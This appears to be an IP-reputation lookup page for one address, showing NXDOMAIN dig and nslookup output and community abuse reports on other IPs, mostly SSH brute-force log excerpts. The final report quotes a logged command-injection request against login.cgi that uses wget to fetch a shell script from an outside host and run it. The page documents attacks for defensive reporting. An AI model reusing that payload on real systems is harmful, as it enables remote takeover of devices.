Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Norway

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 141.0.10.241
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60533
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;141.0.10.241.			IN	A

;; AUTHORITY SECTION:
.			371	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022030803 1800 900 604800 86400

;; Query time: 66 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Mar 09 09:15:51 CST 2022
;; MSG SIZE  rcvd: 105
Host info
Host 241.10.0.141.in-addr.arpa. not found: 3(NXDOMAIN)
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 241.10.0.141.in-addr.arpa: NXDOMAIN
Related IP info:
Related comments:
IP Type Details Datetime
153.36.242.143 attackspambots
2019-09-05T17:05:07.712959abusebot-3.cloudsearch.cf sshd\[20968\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=153.36.242.143  user=root
2019-09-06 01:05:48
52.187.171.30 attackbots
Sep  5 06:04:40 this_host sshd[5623]: Invalid user testftp from 52.187.171.30
Sep  5 06:04:40 this_host sshd[5623]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=52.187.171.30 
Sep  5 06:04:42 this_host sshd[5623]: Failed password for invalid user testftp from 52.187.171.30 port 55616 ssh2
Sep  5 06:04:42 this_host sshd[5623]: Received disconnect from 52.187.171.30: 11: Bye Bye [preauth]
Sep  5 06:19:01 this_host sshd[5875]: Invalid user tsbot from 52.187.171.30
Sep  5 06:19:01 this_host sshd[5875]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=52.187.171.30 
Sep  5 06:19:02 this_host sshd[5875]: Failed password for invalid user tsbot from 52.187.171.30 port 41046 ssh2
Sep  5 06:19:03 this_host sshd[5875]: Received disconnect from 52.187.171.30: 11: Bye Bye [preauth]
Sep  5 06:24:42 this_host sshd[5945]: Invalid user temp1 from 52.187.171.30
Sep  5 06:24:42 this_host sshd[5945]: pam_unix........
-------------------------------
2019-09-06 01:08:30
81.174.227.27 attackspambots
Sep  5 18:39:44 plex sshd[1453]: Invalid user ubuntuubuntu from 81.174.227.27 port 42726
2019-09-06 00:43:13
157.245.11.213 attack
EventTime:Thu Sep 5 18:27:34 AEST 2019,EventName:Client denied: configuration,TargetDataNamespace:/,TargetDataContainer:srv/www/upperbay.info/site/,TargetDataName:E_NULL,SourceIP:157.245.11.213,VendorOutcomeCode:E_NULL,InitiatorServiceName:42544
2019-09-06 01:30:03
37.139.24.190 attack
Sep  5 06:56:07 hanapaa sshd\[24916\]: Invalid user ubuntu from 37.139.24.190
Sep  5 06:56:07 hanapaa sshd\[24916\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=37.139.24.190
Sep  5 06:56:09 hanapaa sshd\[24916\]: Failed password for invalid user ubuntu from 37.139.24.190 port 46852 ssh2
Sep  5 07:00:40 hanapaa sshd\[25298\]: Invalid user chris from 37.139.24.190
Sep  5 07:00:40 hanapaa sshd\[25298\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=37.139.24.190
2019-09-06 01:30:36
73.161.112.2 attack
Sep  5 12:38:03 meumeu sshd[11971]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=73.161.112.2 
Sep  5 12:38:05 meumeu sshd[11971]: Failed password for invalid user chris from 73.161.112.2 port 57114 ssh2
Sep  5 12:42:16 meumeu sshd[12410]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=73.161.112.2 
...
2019-09-06 01:20:15
124.94.55.10 attackspambots
Unauthorised access (Sep  5) SRC=124.94.55.10 LEN=40 TTL=49 ID=27776 TCP DPT=8080 WINDOW=60157 SYN 
Unauthorised access (Sep  5) SRC=124.94.55.10 LEN=40 TTL=49 ID=43528 TCP DPT=8080 WINDOW=14756 SYN 
Unauthorised access (Sep  4) SRC=124.94.55.10 LEN=40 TTL=49 ID=28749 TCP DPT=8080 WINDOW=43492 SYN
2019-09-06 00:28:40
5.166.180.213 attackbots
Sep  5 10:14:50 cip-sv-login01 sshd[14169]: Invalid user admin from 5.166.180.213
Sep  5 10:14:54 cip-sv-login01 sshd[14169]: Failed password for invalid user admin from 5.166.180.213 port 57142 ssh2
Sep  5 10:14:56 cip-sv-login01 sshd[14169]: Failed password for invalid user admin from 5.166.180.213 port 57142 ssh2
Sep  5 10:15:00 cip-sv-login01 sshd[14169]: Failed password for invalid user admin from 5.166.180.213 port 57142 ssh2
Sep  5 10:15:02 cip-sv-login01 sshd[14169]: Failed password for invalid user admin from 5.166.180.213 port 57142 ssh2
Sep  5 10:15:04 cip-sv-login01 sshd[14169]: Failed password for invalid user admin from 5.166.180.213 port 57142 ssh2

........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=5.166.180.213
2019-09-06 00:37:58
5.189.166.57 attackspam
(sshd) Failed SSH login from 5.189.166.57 (DE/Germany/vmi275934.contaboserver.net): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Sep  5 05:02:40 testbed sshd[3003]: Failed password for root from 5.189.166.57 port 39324 ssh2
Sep  5 05:02:41 testbed sshd[3008]: Invalid user oracle from 5.189.166.57 port 39532
Sep  5 05:02:44 testbed sshd[3008]: Failed password for invalid user oracle from 5.189.166.57 port 39532 ssh2
Sep  5 05:02:47 testbed sshd[3015]: Failed password for root from 5.189.166.57 port 39770 ssh2
Sep  5 05:02:49 testbed sshd[3021]: Invalid user applprod from 5.189.166.57 port 39974
2019-09-06 00:24:00
120.132.106.195 attackspam
k+ssh-bruteforce
2019-09-06 01:31:17
193.252.168.92 attackspam
Sep  5 10:14:11 mail sshd[4654]: Invalid user temp from 193.252.168.92
Sep  5 10:14:11 mail sshd[4654]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=193.252.168.92
Sep  5 10:14:11 mail sshd[4654]: Invalid user temp from 193.252.168.92
Sep  5 10:14:14 mail sshd[4654]: Failed password for invalid user temp from 193.252.168.92 port 33884 ssh2
Sep  5 10:28:35 mail sshd[26774]: Invalid user frappe from 193.252.168.92
...
2019-09-06 00:58:04
220.163.107.130 attackspambots
Sep  5 19:03:37 yabzik sshd[23763]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.163.107.130
Sep  5 19:03:38 yabzik sshd[23763]: Failed password for invalid user test from 220.163.107.130 port 36756 ssh2
Sep  5 19:07:08 yabzik sshd[24952]: Failed password for root from 220.163.107.130 port 49560 ssh2
2019-09-06 00:33:35
169.197.108.6 attackbots
Microsoft Windows HTTP.sys Remote Code Execution Vulnerability, PTR: survey.internet-census.org.
2019-09-06 00:55:02
179.33.137.117 attack
Sep  5 13:37:29 web8 sshd\[27600\]: Invalid user ts from 179.33.137.117
Sep  5 13:37:29 web8 sshd\[27600\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=179.33.137.117
Sep  5 13:37:31 web8 sshd\[27600\]: Failed password for invalid user ts from 179.33.137.117 port 54358 ssh2
Sep  5 13:43:52 web8 sshd\[30654\]: Invalid user demo from 179.33.137.117
Sep  5 13:43:52 web8 sshd\[30654\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=179.33.137.117
2019-09-06 01:11:26
182.61.179.214 attack
182.61.179.214 - - [05/Sep/2019:10:29:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.72.206.82/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0"
...
2019-09-06 00:21:18

Recently Reported IPs

141.0.10.24 141.0.10.243 141.0.10.244 141.0.10.245
141.0.10.242 141.0.10.247 141.0.10.246 141.0.10.248
118.96.113.74 141.0.10.249 141.0.10.25 141.0.10.250
141.0.10.251 141.0.10.252 141.0.10.255 141.0.10.28
141.0.10.253 141.0.10.26 141.0.10.254 141.0.10.27